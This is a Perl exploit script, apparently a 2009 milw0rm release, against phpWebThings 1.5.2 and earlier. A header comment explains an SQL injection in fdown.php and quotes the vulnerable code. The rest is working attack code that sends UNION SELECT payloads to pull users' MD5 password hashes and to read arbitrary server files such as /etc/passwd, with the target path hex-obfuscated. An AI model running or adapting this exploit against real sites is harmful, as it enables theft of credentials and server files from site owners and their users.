177 lines
No EOL
9.2 KiB
Perl
Executable file
177 lines
No EOL
9.2 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
###################################################################################################
|
|
# phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit #
|
|
# #
|
|
# by staker #
|
|
# ------------------------------ #
|
|
# mail: staker[at]hotmail[dot]it #
|
|
# url: http://phpwebthings.nl #
|
|
# ------------------------------ #
|
|
# #
|
|
# NOTE: #
|
|
# 1. it works regardless of php.ini settings #
|
|
# 2. wt_config.php contains mysql login #
|
|
# #
|
|
# short explanation: #
|
|
# ---------------------------------------------------- #
|
|
# phpWebThings contains a flaw that allows an attacker #
|
|
# to carry out an SQL injection attack. The issue is #
|
|
# due to the fdown.php script not properly sanitizing #
|
|
# user-supplied input to the 'id' variable. This may #
|
|
# allow an attacker to inject or manipulate #
|
|
# SQL queries in the backend database (php.ini indep) #
|
|
# ---------------------------------------------------- #
|
|
# #
|
|
# [file: fdown.php] #
|
|
# ------------------------------------ #
|
|
# #
|
|
# <?php #
|
|
# include_once("core/main.php"); #
|
|
# #
|
|
# $ret = db_query("select file from {$config["prefix"]}_forum_msgs where cod={$_REQUEST["id"]}"); #
|
|
# $row = db_fetch_array($ret); #
|
|
# header('HTTP/1.1 200 OK'); #
|
|
# header('Date: ' . date("D M j G:i:s T Y")); #
|
|
# header('Last-Modified: ' . date("D M j G:i:s T Y")); #
|
|
# header("Content-Type: application/force-download"); #
|
|
# header("Content-Lenght: " . (string)(filesize("var/forumfiles/{$row["file"]}"))); #
|
|
# header("Content-Transfer-Encoding: Binary"); #
|
|
# header("Content-Disposition: attachment; filename={$row["file"]}"); #
|
|
# readfile("var/forumfiles/{$row["file"]}"); #
|
|
# #
|
|
# ?> #
|
|
# #
|
|
# ------------------------------------- #
|
|
# #
|
|
# yeat@snippet:~/Desktop$ perl a.pl localhost/cms -c 1 #
|
|
# [*--------------------------------------------------------------------*] #
|
|
# [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *] #
|
|
# [*--------------------------------------------------------------------*] #
|
|
# [* Usage: perl web.pl [target + path] [OPTIONS] *] #
|
|
# [* *] #
|
|
# [* Options: *] #
|
|
# [* [files] -d ../../../../../../etc/passwd *] #
|
|
# [* [hash.] -c user_id *] #
|
|
# [* [table] -t set a table prefix (default: wt) *] #
|
|
# [*--------------------------------------------------------------------*] #
|
|
# [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671 #
|
|
# #
|
|
# ---------------------------------------------------------- #
|
|
# Today is: 12 June 2009 #
|
|
# Location: Italy,Turin. #
|
|
# http://www.youtube.com/watch?v=E78BGajeuAI&feature=related #
|
|
# ---------------------------------------------------------- #
|
|
###################################################################################################
|
|
|
|
use LWP::UserAgent;
|
|
use Getopt::Long;
|
|
|
|
&phpWebThings::init;
|
|
|
|
my ($files,$admin,$ua_lib,$domain,$table);
|
|
|
|
$domain = $ARGV[0] || exit(0);
|
|
|
|
|
|
$ua_lib = LWP::UserAgent->new(
|
|
timeout => 5,
|
|
max_redirect => 0,
|
|
agent => 'Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)',
|
|
) || die $!;
|
|
|
|
GetOptions(
|
|
'p=s' => \$proxy,
|
|
'd=s' => \$files,
|
|
'c=i' => \$admin,
|
|
't=s' => \$table,
|
|
);
|
|
|
|
|
|
die(&phpWebThings::Exploit);
|
|
|
|
|
|
sub phpWebThings::Exploit()
|
|
{
|
|
return Disclose::File($files) if defined $files;
|
|
return Retrieve::Hash($admin) if defined $admin;
|
|
}
|
|
|
|
|
|
sub Disclose::File
|
|
{
|
|
my $filename = $_[0] || die $!;
|
|
|
|
my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
|
|
|
|
my $response = $ua_lib->post(parse::URL($domain.$keywords),
|
|
[ id => "1/**/union/**/select/**/0x".Hex::convert($filename)."#" ]);
|
|
|
|
if ($response->status_line =~ /^(302|200|301)/) {
|
|
return $response->content;
|
|
}
|
|
else {
|
|
return $response->as_string;
|
|
}
|
|
}
|
|
|
|
sub Retrieve::Hash()
|
|
{
|
|
my $user_id = $_[0] || die $!;
|
|
|
|
my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
|
|
|
|
my $prefix = (defined $table) ? $table : 'wt';
|
|
|
|
my $response = $ua_lib->post(parse::URL($domain.$keywords),
|
|
[ id => "1 UNION SELECT password FROM ${prefix}_users WHERE uid=$user_id#" ]);
|
|
|
|
if ($response->status_line =~ /^(302|200|301)/)
|
|
{
|
|
if ($response->content =~ /([0-9a-f]{32})/) {
|
|
return "[* MD5 Hash: $1\n";
|
|
}
|
|
}
|
|
else {
|
|
return $response->as_string;
|
|
}
|
|
}
|
|
|
|
|
|
sub Hex::convert()
|
|
{
|
|
my $string = shift @_ || die $!;
|
|
|
|
return unpack("H*",$string);
|
|
}
|
|
|
|
|
|
sub parse::URL()
|
|
{
|
|
my $string = shift @_ || die($!);
|
|
|
|
if ($string !~ /^http:\/\/?/i) {
|
|
$string = 'http://'.$string;
|
|
}
|
|
|
|
return $string;
|
|
|
|
}
|
|
|
|
|
|
|
|
sub phpWebThings::init
|
|
{
|
|
print "[*--------------------------------------------------------------------*]\n".
|
|
"[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *]\n".
|
|
"[*--------------------------------------------------------------------*]\n".
|
|
"[* Usage: perl web.pl [target + path] [OPTIONS] *]\n".
|
|
"[* *]\n".
|
|
"[* Options: *]\n".
|
|
"[* [files] -d ../../../../../../etc/passwd *]\n".
|
|
"[* [hash.] -c user_id *]\n".
|
|
"[* [table] -t set a table prefix (default: wt) *]\n".
|
|
"[*--------------------------------------------------------------------*]\n";
|
|
}
|
|
|
|
# milw0rm.com [2009-06-12] |